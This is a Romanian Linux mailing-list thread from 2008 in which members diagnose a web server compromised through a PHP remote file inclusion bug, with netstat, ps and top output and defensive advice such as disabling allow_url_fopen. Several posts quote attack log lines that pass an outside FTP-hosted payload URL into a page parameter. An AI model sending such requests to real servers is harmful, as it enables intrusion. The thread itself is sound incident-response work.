Re: [rlug] ce vulnerabilitate e asta ?

2008-01-22 Thread Tudor GHEORGHE

[EMAIL PROTECTED] wrote:

 [xx/Jan/2008:03:43:16 +0200] "GET /index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 
13360 "-" "libwww-perl/5.805"
 [xx/Jan/2008:03:43:23 +0200] "GET /index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 
13360 "-" "Mozilla/5.0"
 [xx/Jan/2008:03:51:39 +0200] "GET /index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 
13360 "-" "libwww-perl/5.805"
 [xx/Jan/2008:03:51:46 +0200] "GET /index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 
13360 "-" "Mozilla/5.0"

Am gasit in /var/tmp/ executabilul iroffer cu owner apache

iroffer is a software program that acts as a fileserver for IRC. It is
similar to a FTP server or WEB server, but users can download files
using the DCC protocol of IRC instead of a web browser.

Probabil ca prin asta isi aducea mai departe ce dorea.

  

Eu nu as fi asa sigur ca doar asta putea sa faca.
Ia acceseaza tu 
http://site-ul-tau/index.php?pg=ftp://80.50.253.90/upload/trop/old? si 
vezi,ce se intampla.

Banuiesc ca este un shell.

--
Teddy


___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-22 Thread mihaivt
On Tue, 22 Jan 2008 08:18:46 +0200
Emil Sirbu wrote:

> 
> > Am incercat tot ce am putut fara reinstall (updates, audit), dar
> > serverul web trebuia sa fie rapid up asa ca i-am dat drumul din nou
> > urmand sa fac investigatii a doua zi
> >
> > A doua zi ... din nou:
> >   
> ia verifica "cron"-ul lui apache
> 
> Dupa ce scapi de goanga, asa cum s-a mai spus, (macar) seteaza in
> php.ini
> 
> allow_url_fopen = off
> 
> 
> si cauta prin scripturile alea  un include/require ce contine $_GET /
> $_POST / $_REQUEST / ... in numele fisierului (daca ai
> register_globals = On  va tb. sa iei toate liniile include/require ce
> contin un nume de variabila la mana)
> 


multumesc tuturor celor care mi-au raspuns. In prima zi cand am
observat buba am verificat de cand timp era pornit procesul suspect, am
aflat astfel ora de incepere si apoi m-am uitat in logul apache la ora 
rspectiva

 [xx/Jan/2008:03:43:16 +0200] "GET 
/index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 13360 "-" 
"libwww-perl/5.805"
 [xx/Jan/2008:03:43:23 +0200] "GET 
/index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 13360 "-" 
"Mozilla/5.0"
 [xx/Jan/2008:03:51:39 +0200] "GET 
/index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 13360 "-" 
"libwww-perl/5.805"
 [xx/Jan/2008:03:51:46 +0200] "GET 
/index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 13360 "-" 
"Mozilla/5.0"

Am vazut chestiile de mai sus si am banuit ca ma foloseste pe post de
proxy. Am incercat insa si eu ceva de genul asta
index.php?pg=http://site.unde.am.acces
Stateam cu tcpdump pe site.unde.am.acces si vroaim sa vad daca imi vine
trafic de la site compromis. Nu venea asa ca am considerat ca chestia
cu index.php?pg=http://blabla a fost doar o tentativa nereusita. Se
pare totusi ca m-am inselat. M-am uitat mai atent in script php si
variabila $_REQUEST['pg'] era preluat fara prea multe verificari si mestecata
apoi fara grija de restul scriptului php. Am trimis problema la
webmaster.

Am gasit in /var/tmp/ executabilul iroffer cu owner apache

iroffer is a software program that acts as a fileserver for IRC. It is
similar to a FTP server or WEB server, but users can download files
using the DCC protocol of IRC instead of a web browser.

Probabil ca prin asta isi aducea mai departe ce dorea.


___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread Emil Sirbu

> Am incercat tot ce am putut fara reinstall (updates, audit), dar
> serverul web trebuia sa fie rapid up asa ca i-am dat drumul din nou
> urmand sa fac investigatii a doua zi
>
> A doua zi ... din nou:
>   
ia verifica "cron"-ul lui apache

Dupa ce scapi de goanga, asa cum s-a mai spus, (macar) seteaza in php.ini

allow_url_fopen = off


si cauta prin scripturile alea  un include/require ce contine $_GET /
$_POST / $_REQUEST / ... in numele fisierului (daca ai register_globals
= On  va tb. sa iei toate liniile include/require ce contin un nume de
variabila la mana)



___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread Tudor GHEORGHE

Mihai Voica wrote:

apache   23626 99.9  1.2  5220 2520 ?R10:04  15:00 /usr/sbin/httpsd 
-i eth0
  


Vezi daca ai in php.ini allow_url_fopen=On.Probabil a profitat cineva de 
un script php negandid suficient.


--
Teddy


___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread [EMAIL PROTECTED]
Vali Dragnuta wrote:
>
>> La nivel strict software nu stiu de un atac prin care sa poti sa sari
>> din masina virtuala in cea reala. Vectorii clasici de atac, in schimb,
>> raman activi.
>> Concluzia finala ... nu mai puneti pe servere web chestii la modul de
>> i-made-this-php-and-i-put-it-on-the-net-for-all-people-to-get-hacked-with-it.
>
> Sint 2 lucruri de considerat :
> 1). De indata ce are control asupra unei masini virtuale e posibil sa
> aiba mai multe posibilitati sa incerce sa compromita alte masini din
> acelasi subnet (Eventual alte masini virtuale rulind in acelasi hardware
> gazda).

Corect.

>
> 2). Openvz este kernel-level virtualization. Ceea ce inseamna ca toate
> guesturile ruleaza sub exact aceeasi instanta de kernel, identica cu a
> gazdei. Nu m-ar mira ca dintr-o astfel de masina virtuala sa se poata
> scapa la un moment dat.
> Nici eu nu cunosc inca situatii in care sa se fi intimplat asa ceva - nu
> inseamna insa ca nu se va face la un moment dat.
> Erau vremuri cind nici din chroot nu se stia ca se poate iesi.
>

 Si aici ai drptate, dar d.p.d.v. al securitatii luam in calcul si
porobabilitatea de a se produce un anume incident, si cati crackeri ar
putea /sti sa faca lucru asta. Si ma mai gandesc acu la colistats-ul
nostru cel necajit(nu doresc nimanui sa fie acu in pielea lui) ca totusi
nu are sit-ul cu problema la vro' firma de super-top, incat sa se
"ingesuie" cracherii pe el cu miile pe ora!



> Drept pentru care am si spus : mai bine sa nu ai nimic compromis.

 Sigur ca e mai bine asa! Oricum ideea din raspunsul meu, era cu referire
la situatia in care nu poate rezolva problema(adica fara nimic
compromis=varianta cea mai buna), pana gaseste o rezolvare, poate apela
la o masina virtuala(din 2 rele, alege o varianta  SEMNIFICATIV mai putin
riscanta).In felul asta castiga timp... pana ii da de cap(e mai dificil
sa gasesti solutia potrivita cand stii ca stai cu "satarul" deasupra
capului). Mie mi se pare ca problema lui nu e chiar simpla, si s-ar putea
sa-i ia ceva timp pana o so' rezolve astfel incat sa NU AIBA NIMIC
COMPROMIS.
  Eu unul cel putin i-i tin pumnii, si daca vrea sa incerce varianta
SUGERATA de mine, il voi ajuta cat imi sat in puteri(adica timp si
cunostinte). Si as fi curios sa aflu ce varianta de rezolvare a ales, si
cu ce rezultate(inclusiv variantele care nu au dat rezultatele
scontate). In felul asta mai capatam si ceva cunostinte in plus!


BAFTA

>
>
>
> ___
> RLUG mailing list
> RLUG@lists.lug.ro
> http://lists.lug.ro/mailman/listinfo/rlug
>



___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread Gabriel VLASIU
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, 21 Jan 2008, Mihai Voica wrote:

> Sorry pt wrap dar am dat paste. Imi poate da cineva o ideea de unde e
> chestia asta si cum o pot remedia fara reinstall ? Serverul a fost
> instalat de altcineva, teoretic doar httpd e serviciu public, se pare
> ca pe acolo e o buba. Distro centOS 4.6
> 
> [EMAIL PROTECTED] netstat -anput
> Active Internet connections (servers and established)
> Proto Recv-Q Send-Q Local Address   Foreign Address 
> State   PID/Program name
> tcp0  0 0.0.0.0:21  0.0.0.0:*   
> LISTEN  11437/vsftpd
> tcp0  0 127.0.0.1:250.0.0.0:*   
> LISTEN  11453/sendmail: acc
> tcp0  0 192.168.100.10:5503169.42.218.68:6667   
> ESTABLISHED 5763/ssh
> tcp0  0 192.168.100.10:3978869.42.218.68:6667   
> ESTABLISHED 5660/ssh
> tcp0  0 :::80   :::*
> LISTEN  5660/ssh
> tcp0  0 :::22 
> 
> (vezi ssh pe port 80 si conexiunile established)
> 
> [EMAIL PROTECTED] ps aux
> USER   PID %CPU %MEM   VSZ  RSS TTY  STAT START   TIME COMMAND
> root 1  0.0  0.0  1692  612 ?Ss   Jan18   0:00 init [3]
> apache5656  0.0  0.0 00 ?Z03:43   0:00 [sh] 
> apache5660 99.9  0.1  4948 3012 ?R03:43 431:51 ssh
> apache5759  0.0  0.0 00 ?Z03:51   0:00 [sh] 
> apache5763 99.9  0.1  4944 3008 ?R03:51 423:32 ssh
> root 11415  0.0  0.0  1596  544 ?Ss   Jan18   0:00 syslogd -m 0
> root 11425  0.0  0.0  4064 1140 ?Ss   Jan18   0:00 /usr/sbin/sshd
> root 11437  0.0  0.0  3780 1012 ?SJan18   0:00 
> /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
> root 11453  0.0  0.0  7340 1824 ?Ss   Jan18   0:00 sendmail: 
> accepting connections
> smmsp11462  0.0  0.0  6488 1636 ?Ss   Jan18   0:00 sendmail: 
> Queue [EMAIL PROTECTED]:00:00 for /var/spool/clientmqueue
> root 11480  0.0  0.3 19748 6372 ?Ss   Jan18   0:00 /usr/sbin/httpd
> apache   11487  0.0  0.2 19888 4940 ?SJan18   0:00 /usr/sbin/httpd
> apache   11488  0.0  0.2 19992 5324 ?SJan18   0:00 /usr/sbin/httpd
> apache   11489  0.0  0.2 19996 5180 ?SJan18   0:00 /usr/sbin/httpd
> apache   11490  0.0  0.2 19888 4940 ?SJan18   0:00 /usr/sbin/httpd
> apache   11491  0.0  0.2 19868 4632 ?SJan18   0:00 /usr/sbin/httpd
> apache   11492  0.0  0.2 19864 4996 ?SJan18   0:00 /usr/sbin/httpd
> apache   11493  0.0  0.2 2 5284 ?SJan18   0:00 /usr/sbin/httpd
> apache   11494  0.0  0.2 19888 4624 ?SJan18   0:00 /usr/sbin/httpd
> apache   22409  0.0  0.1 19748 3712 ?S10:20   0:00 /usr/sbin/httpd
> root 23993  0.0  0.0  1856  308 ?Ss   10:26   0:00 vzctl: pts/0
> root 23994  0.0  0.0  2216 1276 pts/0Ss   10:26   0:00 -bash
> root 25831  0.0  0.0  2372  756 pts/0R+   10:55   0:00 ps aux
> apache   30358  0.0  0.2 19888 4612 ?S01:05   0:00 /usr/sbin/httpd
> 
> 
> (vezi cele 2 procese de 99%)
> 
> 
> [EMAIL PROTECTED] top -b -n1
> top - 11:03:12 up 15:50,  0 users,  load average: 2.00, 2.00, 2.00
> Tasks:  24 total,   3 running,  19 sleeping,   0 stopped,   2 zombie
> Cpu(s): 10.9% us,  1.5% sy,  0.0% ni, 87.6% id,  0.1% wa,  0.0% hi,  0.0% si
> Mem:   2067756k total,  2007924k used,59832k free,   211024k buffers
> Swap:  2031608k total,   72k used,  2031536k free,   825952k cached
> 
>   PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
>  5660 apache25   0  4948 3012 1244 R 99.6  0.1 439:43.42 perl
>  5763 apache25   0  4944 3008 1248 R 97.6  0.1 431:24.66 perl
> 1 root  15   0  1692  612  528 S  0.0  0.0   0:00.10 init
>  5656 apache16   0 000 Z  0.0  0.0   0:00.00 sh 
>  5759 apache16   0 000 Z  0.0  0.0   0:00.00 sh 
> 11415 root  23   0  1596  544  456 S  0.0  0.0   0:00.02 syslogd
> 11425 root  20   0  4064 1140  836 S  0.0  0.1   0:00.06 sshd
> 11437 root  18   0  3780 1012  772 S  0.0  0.0   0:00.00 vsftpd
> 11453 root  18   0  7340 1824  864 S  0.0  0.1   0:00.01 sendmail
> 11462 smmsp 15   0  6488 1636  820 S  0.0  0.1   0:00.00 sendmail
> 11480 root  18   0 19748 6372 3960 S  0.0  0.3   0:00.07 httpd
> 11487 apache15   0 19888 4940 2352 S  0.0  0.2   0:00.15 httpd
> 11488 apache15   0 19992 5324 2676 S  0.0  0.3   0:00.13 httpd
> 11489 apache15   0 19996 5180 2544 S  0.0  0.3   0:00.10 httpd
> 11490 apache15   0 19888 4940 2352 S  0.0  0.2   0:00.11 httpd
> 11491 apache18   0 19868 4632 2040 S  0.0  0.2   0:00.11 httpd
> 11492 apache18   0 19864 4996 2384 S  0.0  0.2   0:00.14 httpd
> 11493 apache15   0 2 5284 2624 S  0.0  0.3   0:00.14 httpd
> 114

Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread Vali Dragnuta

> La nivel strict software nu stiu de un atac prin care sa poti sa sari 
> din masina virtuala in cea reala. Vectorii clasici de atac, in schimb, 
> raman activi.
> Concluzia finala ... nu mai puneti pe servere web chestii la modul de 
> i-made-this-php-and-i-put-it-on-the-net-for-all-people-to-get-hacked-with-it.

Sint 2 lucruri de considerat : 
1). De indata ce are control asupra unei masini virtuale e posibil sa
aiba mai multe posibilitati sa incerce sa compromita alte masini din
acelasi subnet (Eventual alte masini virtuale rulind in acelasi hardware
gazda).

2). Openvz este kernel-level virtualization. Ceea ce inseamna ca toate
guesturile ruleaza sub exact aceeasi instanta de kernel, identica cu a
gazdei. Nu m-ar mira ca dintr-o astfel de masina virtuala sa se poata
scapa la un moment dat. 
Nici eu nu cunosc inca situatii in care sa se fi intimplat asa ceva - nu
inseamna insa ca nu se va face la un moment dat.
Erau vremuri cind nici din chroot nu se stia ca se poate iesi.

Drept pentru care am si spus : mai bine sa nu ai nimic compromis. 



___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread Radu Oprisan

Vali Dragnuta wrote:

  Totusi nu e mai bine sa ai in cel mai rau caz, o masina virtuala
compromisa(si un serviciu care nu-ti functionaza), decat sa ai o masina
complet compromisa, care daca nu e intr-un DMZ iti poate introduce
"mizerii" si in LAN-le in care e conectata?



E mai bine sa nu ai nimic compromis. Cit despre compromiterea masinii
virtuale, de acolo poate incerca sa sara mai departe...


  
La nivel strict software nu stiu de un atac prin care sa poti sa sari 
din masina virtuala in cea reala. Vectorii clasici de atac, in schimb, 
raman activi.
Concluzia finala ... nu mai puneti pe servere web chestii la modul de 
i-made-this-php-and-i-put-it-on-the-net-for-all-people-to-get-hacked-with-it.



___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread Vali Dragnuta

>   Totusi nu e mai bine sa ai in cel mai rau caz, o masina virtuala
> compromisa(si un serviciu care nu-ti functionaza), decat sa ai o masina
> complet compromisa, care daca nu e intr-un DMZ iti poate introduce
> "mizerii" si in LAN-le in care e conectata?

E mai bine sa nu ai nimic compromis. Cit despre compromiterea masinii
virtuale, de acolo poate incerca sa sara mai departe...


___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread [EMAIL PROTECTED]
lonely wolf wrote:
> [EMAIL PROTECTED] wrote:
>> Radu Oprisan wrote:
>>
>>> Mihai Voica wrote:
>>>
 Sorry pt wrap dar am dat paste. Imi poate da cineva o ideea de unde e
 chestia asta si cum o pot remedia fara reinstall ? Serverul a fost
 instalat de altcineva, teoretic doar httpd e serviciu public, se pare
 ca pe acolo e o buba. Distro centOS 4.6
 ...

>>
>> Incearca pe variantele date de Radu Oprisan, mie mi s-au parut de bun
>> simt. Daca ce zice el nu i-ti rezolva problema, poti incerca sa REDUCI
>> suparafata de ATAC:
>>
>> 1.
>> -daca ai partitie separata pt. /tmp, incearaca so montezi cu
>> nodev,noexec,nosuid(asata depinde si ce programe ai pe sistem, unele e
>> posibil sa nu "inghita" asa ceva.);
>>
> logwatch in configuratia implicita vrea sa poata executa scripturi
> scrise de el insusi in /tmp

si nu se poate schimba sa scrie in alta parte ?

>
>> 2.
>> -poti incerca modulul de apache, libapache2-mod-security2(e si pt.
>> apache
>> vers. 1.x);
>>
> din cite stiu eu, in centos nu exista
>
>
>> 3.
>>
>> a.daca instalarea care o ai la apache, nu depinde de alte
>> programe/aplicatii(baze de date customizate, aplicatii customizate, in
>> care nu stii cum se leaga de apache), poti pune openvz(masina virtula,
>> are
>> pachete/kernel pt. centOS), cu obs. de mai jos:
>> -refaci instalarea de apache in masina virtula-nu cred ca e nici un risc
>> daca instalezi un kernel nou, in cel mai rau caz, revii la kernelul
>> vechi,
>> evident, trebuie si back-up inainte;
>> -dupa refacerea instalarii de apache in masina virtuala, poti testa cat
>> vrei(practic nu depinde de instalarea initiala de apache), si daca
>> consideri ca e ok, atunci opresti apache-ul initial, si faci accesibil
>> apace-ul din masina virtuala;
>>
> sau in loc sa te scremi cu virtualizari nesuportate de distributie,
> folosesti xen sau kvm.

si daca face cu kvm sau xen, poate limita consumul de cpu/ram(ca omul are
procese care manca o gramada de CPU) per masina virtuala in 5 minute cat
dureaza in openvz, chiar daca scrie cu o singura mana(sau trebe sa stea 3
zile ca sa puna pe picioare un xen?)

> oricum nu o sa iti foloseasca absolut la nimic atita timp cit problemele
> provin din content-ul site-ului web

  Totusi nu e mai bine sa ai in cel mai rau caz, o masina virtuala
compromisa(si un serviciu care nu-ti functionaza), decat sa ai o masina
complet compromisa, care daca nu e intr-un DMZ iti poate introduce
"mizerii" si in LAN-le in care e conectata?

>> -inainte de asta, poti face(chiar recomandat) un firewall in masina
>> gazda,
>> cat si in masina virtuala care sa impiedice propagarea atacurilor din
>> masima virtuala catre masina gazda si catre LAN-ul din care face parte.
>>
> incepind cu niste reguli de bun simt, de genul
> #accepti conexiuni initiate de altii catre serverul tau
> iptables -I INPUT -p tcp --dport 80 -j ACCEPT
> #raspunzi la conexiunile de mai sus, dar nu initiezi
> iptables -A OUTPUT -p tcp --sport 80 -j RELATED, ESTABLISHED -j ACCEPT
> #urmeaza apoi niste DROP-uri bine alese (care sa includa si toate
> porturile unde nu ar trebui sa fie nimic pornit)
>
> --
> "A computer will not make a good manager out of a bad manager.
>  It makes a good manager better faster and a bad manager worse faster."
>  Ed Esber, president, Ashton-Tate, 1986
>
>
> ___
> RLUG mailing list
> RLUG@lists.lug.ro
> http://lists.lug.ro/mailman/listinfo/rlug
>



___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread lonely wolf

[EMAIL PROTECTED] wrote:

Radu Oprisan wrote:
  

Mihai Voica wrote:


Sorry pt wrap dar am dat paste. Imi poate da cineva o ideea de unde e
chestia asta si cum o pot remedia fara reinstall ? Serverul a fost
instalat de altcineva, teoretic doar httpd e serviciu public, se pare
ca pe acolo e o buba. Distro centOS 4.6
...
  


Incearca pe variantele date de Radu Oprisan, mie mi s-au parut de bun
simt. Daca ce zice el nu i-ti rezolva problema, poti incerca sa REDUCI
suparafata de ATAC:

1.
-daca ai partitie separata pt. /tmp, incearaca so montezi cu
nodev,noexec,nosuid(asata depinde si ce programe ai pe sistem, unele e
posibil sa nu "inghita" asa ceva.);
  
logwatch in configuratia implicita vrea sa poata executa scripturi 
scrise de el insusi in /tmp



2.
-poti incerca modulul de apache, libapache2-mod-security2(e si pt. apache
vers. 1.x);
  

din cite stiu eu, in centos nu exista



3.

a.daca instalarea care o ai la apache, nu depinde de alte
programe/aplicatii(baze de date customizate, aplicatii customizate, in
care nu stii cum se leaga de apache), poti pune openvz(masina virtula, are
pachete/kernel pt. centOS), cu obs. de mai jos:
-refaci instalarea de apache in masina virtula-nu cred ca e nici un risc
daca instalezi un kernel nou, in cel mai rau caz, revii la kernelul vechi,
evident, trebuie si back-up inainte;
-dupa refacerea instalarii de apache in masina virtuala, poti testa cat
vrei(practic nu depinde de instalarea initiala de apache), si daca
consideri ca e ok, atunci opresti apache-ul initial, si faci accesibil
apace-ul din masina virtuala;
  
sau in loc sa te scremi cu virtualizari nesuportate de distributie, 
folosesti xen sau kvm.
oricum nu o sa iti foloseasca absolut la nimic atita timp cit problemele 
provin din content-ul site-ului web



-inainte de asta, poti face(chiar recomandat) un firewall in masina gazda,
cat si in masina virtuala care sa impiedice propagarea atacurilor din
masima virtuala catre masina gazda si catre LAN-ul din care face parte.
  

incepind cu niste reguli de bun simt, de genul
#accepti conexiuni initiate de altii catre serverul tau
iptables -I INPUT -p tcp --dport 80 -j ACCEPT
#raspunzi la conexiunile de mai sus, dar nu initiezi
iptables -A OUTPUT -p tcp --sport 80 -j RELATED, ESTABLISHED -j ACCEPT
#urmeaza apoi niste DROP-uri bine alese (care sa includa si toate 
porturile unde nu ar trebui sa fie nimic pornit)


--
"A computer will not make a good manager out of a bad manager.
It makes a good manager better faster and a bad manager worse faster."
Ed Esber, president, Ashton-Tate, 1986


___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread [EMAIL PROTECTED]
Radu Oprisan wrote:
> Mihai Voica wrote:
>> Sorry pt wrap dar am dat paste. Imi poate da cineva o ideea de unde e
>> chestia asta si cum o pot remedia fara reinstall ? Serverul a fost
>> instalat de altcineva, teoretic doar httpd e serviciu public, se pare
>> ca pe acolo e o buba. Distro centOS 4.6
>> ...

Incearca pe variantele date de Radu Oprisan, mie mi s-au parut de bun
simt. Daca ce zice el nu i-ti rezolva problema, poti incerca sa REDUCI
suparafata de ATAC:

1.
-daca ai partitie separata pt. /tmp, incearaca so montezi cu
nodev,noexec,nosuid(asata depinde si ce programe ai pe sistem, unele e
posibil sa nu "inghita" asa ceva.);
-idem si pt. /home;
-incearaca daca poti sa instalezi libsafe;

2.
-poti incerca modulul de apache, libapache2-mod-security2(e si pt. apache
vers. 1.x);

3.

a.daca instalarea care o ai la apache, nu depinde de alte
programe/aplicatii(baze de date customizate, aplicatii customizate, in
care nu stii cum se leaga de apache), poti pune openvz(masina virtula, are
pachete/kernel pt. centOS), cu obs. de mai jos:
-refaci instalarea de apache in masina virtula-nu cred ca e nici un risc
daca instalezi un kernel nou, in cel mai rau caz, revii la kernelul vechi,
evident, trebuie si back-up inainte;
-dupa refacerea instalarii de apache in masina virtuala, poti testa cat
vrei(practic nu depinde de instalarea initiala de apache), si daca
consideri ca e ok, atunci opresti apache-ul initial, si faci accesibil
apace-ul din masina virtuala;
-inainte de asta, poti face(chiar recomandat) un firewall in masina gazda,
cat si in masina virtuala care sa impiedice propagarea atacurilor din
masima virtuala catre masina gazda si catre LAN-ul din care face parte.

b. in felul asta poti rula un apache(sau orice alata aplicatie/daemon) cu
probleme, reducand semnificativ suprafata de atac.


Iti urez bafta si rezolvare usoara!


___
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug


Re: [rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread Radu Oprisan

Mihai Voica wrote:

Sorry pt wrap dar am dat paste. Imi poate da cineva o ideea de unde e
chestia asta si cum o pot remedia fara reinstall ? Serverul a fost
instalat de altcineva, teoretic doar httpd e serviciu public, se pare
ca pe acolo e o buba. Distro centOS 4.6

[EMAIL PROTECTED] netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address   Foreign Address 
State   PID/Program name
tcp0  0 0.0.0.0:21  0.0.0.0:*   
LISTEN  11437/vsftpd
tcp0  0 127.0.0.1:250.0.0.0:*   
LISTEN  11453/sendmail: acc
tcp0  0 192.168.100.10:5503169.42.218.68:6667   
ESTABLISHED 5763/ssh
tcp0  0 192.168.100.10:3978869.42.218.68:6667   
ESTABLISHED 5660/ssh
tcp0  0 :::80   :::*
LISTEN  5660/ssh
tcp0  0 :::22 

  


Frumos. Eu as incepe prin a studia logurile de acces. Undeva o sa ai 
probabil ceva la modul de "=http://blablabla";. Adica ai intr-un script 
(ma repet, probabil) un remote file inclusion, ceea ce inseamna ca ala 
accepta ca parametru orice iar cum php e baiat destept, iti deschide 
fisiere, pagini web & so on. Rezolva problema asta si asteapta sa mai 
apara altele (e stiut ca dupa ce rezolvi o problema apar 100).



(vezi ssh pe port 80 si conexiunile established)

[EMAIL PROTECTED] ps aux
USER   PID %CPU %MEM   VSZ  RSS TTY  STAT START   TIME COMMAND
root 1  0.0  0.0  1692  612 ?Ss   Jan18   0:00 init [3]
apache5656  0.0  0.0 00 ?Z03:43   0:00 [sh] 
apache5660 99.9  0.1  4948 3012 ?R03:43 431:51 ssh
apache5759  0.0  0.0 00 ?Z03:51   0:00 [sh] 
apache5763 99.9  0.1  4944 3008 ?R03:51 423:32 ssh
root 11415  0.0  0.0  1596  544 ?Ss   Jan18   0:00 syslogd -m 0
root 11425  0.0  0.0  4064 1140 ?Ss   Jan18   0:00 /usr/sbin/sshd
root 11437  0.0  0.0  3780 1012 ?SJan18   0:00 /usr/sbin/vsftpd 
/etc/vsftpd/vsftpd.conf
root 11453  0.0  0.0  7340 1824 ?Ss   Jan18   0:00 sendmail: 
accepting connections
smmsp11462  0.0  0.0  6488 1636 ?Ss   Jan18   0:00 sendmail: Queue 
[EMAIL PROTECTED]:00:00 for /var/spool/clientmqueue
root 11480  0.0  0.3 19748 6372 ?Ss   Jan18   0:00 /usr/sbin/httpd
apache   11487  0.0  0.2 19888 4940 ?SJan18   0:00 /usr/sbin/httpd
apache   11488  0.0  0.2 19992 5324 ?SJan18   0:00 /usr/sbin/httpd
apache   11489  0.0  0.2 19996 5180 ?SJan18   0:00 /usr/sbin/httpd
apache   11490  0.0  0.2 19888 4940 ?SJan18   0:00 /usr/sbin/httpd
apache   11491  0.0  0.2 19868 4632 ?SJan18   0:00 /usr/sbin/httpd
apache   11492  0.0  0.2 19864 4996 ?SJan18   0:00 /usr/sbin/httpd
apache   11493  0.0  0.2 2 5284 ?SJan18   0:00 /usr/sbin/httpd
apache   11494  0.0  0.2 19888 4624 ?SJan18   0:00 /usr/sbin/httpd
apache   22409  0.0  0.1 19748 3712 ?S10:20   0:00 /usr/sbin/httpd
root 23993  0.0  0.0  1856  308 ?Ss   10:26   0:00 vzctl: pts/0
root 23994  0.0  0.0  2216 1276 pts/0Ss   10:26   0:00 -bash
root 25831  0.0  0.0  2372  756 pts/0R+   10:55   0:00 ps aux
apache   30358  0.0  0.2 19888 4612 ?S01:05   0:00 /usr/sbin/httpd


  


Este bine ca procesele infiltrate ruleaza ca apache. Asta inseamna ca 
cel mai probabil nu a fost compromis tot sistemul ci doar userul de apache.
Daca e asa vezi pasul de mai sus si pe urma verifica toate directoarele 
in care are acces de scriere userul apache. Cel mai probabil ceea ce 
cauti va fi in /tmp sau /var/tmp (la -la is your friend, fi atent la 
directoare de genul " "(spatiu) "..." etc.)



(vezi cele 2 procese de 99%)


[EMAIL PROTECTED] top -b -n1
top - 11:03:12 up 15:50,  0 users,  load average: 2.00, 2.00, 2.00
Tasks:  24 total,   3 running,  19 sleeping,   0 stopped,   2 zombie
Cpu(s): 10.9% us,  1.5% sy,  0.0% ni, 87.6% id,  0.1% wa,  0.0% hi,  0.0% si
Mem:   2067756k total,  2007924k used,59832k free,   211024k buffers
Swap:  2031608k total,   72k used,  2031536k free,   825952k cached

  PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
 5660 apache25   0  4948 3012 1244 R 99.6  0.1 439:43.42 perl
 5763 apache25   0  4944 3008 1248 R 97.6  0.1 431:24.66 perl
1 root  15   0  1692  612  528 S  0.0  0.0   0:00.10 init
 5656 apache16   0 000 Z  0.0  0.0   0:00.00 sh 
 5759 apache16   0 000 Z  0.0  0.0   0:00.00 sh 
11415 root  23   0  1596  544  456 S  0.0  0.0   0:00.02 syslogd
11425 root  20   0  4064 1140  836 S  0.0  0.1   0:00.06 sshd
11437 root  18   0  3780 1012  772 S  0.0  0.0   0:00.00 vsftpd
11453 root  18   0  7340 1824  864 S  0.0  0.1   0:00.01 sendmail
11462

[rlug] ce vulnerabilitate e asta ?

2008-01-21 Thread Mihai Voica
Sorry pt wrap dar am dat paste. Imi poate da cineva o ideea de unde e
chestia asta si cum o pot remedia fara reinstall ? Serverul a fost
instalat de altcineva, teoretic doar httpd e serviciu public, se pare
ca pe acolo e o buba. Distro centOS 4.6

[EMAIL PROTECTED] netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address   Foreign Address 
State   PID/Program name
tcp0  0 0.0.0.0:21  0.0.0.0:*   
LISTEN  11437/vsftpd
tcp0  0 127.0.0.1:250.0.0.0:*   
LISTEN  11453/sendmail: acc
tcp0  0 192.168.100.10:5503169.42.218.68:6667   
ESTABLISHED 5763/ssh
tcp0  0 192.168.100.10:3978869.42.218.68:6667   
ESTABLISHED 5660/ssh
tcp0  0 :::80   :::*
LISTEN  5660/ssh
tcp0  0 :::22 

(vezi ssh pe port 80 si conexiunile established)

[EMAIL PROTECTED] ps aux
USER   PID %CPU %MEM   VSZ  RSS TTY  STAT START   TIME COMMAND
root 1  0.0  0.0  1692  612 ?Ss   Jan18   0:00 init [3]
apache5656  0.0  0.0 00 ?Z03:43   0:00 [sh] 
apache5660 99.9  0.1  4948 3012 ?R03:43 431:51 ssh
apache5759  0.0  0.0 00 ?Z03:51   0:00 [sh] 
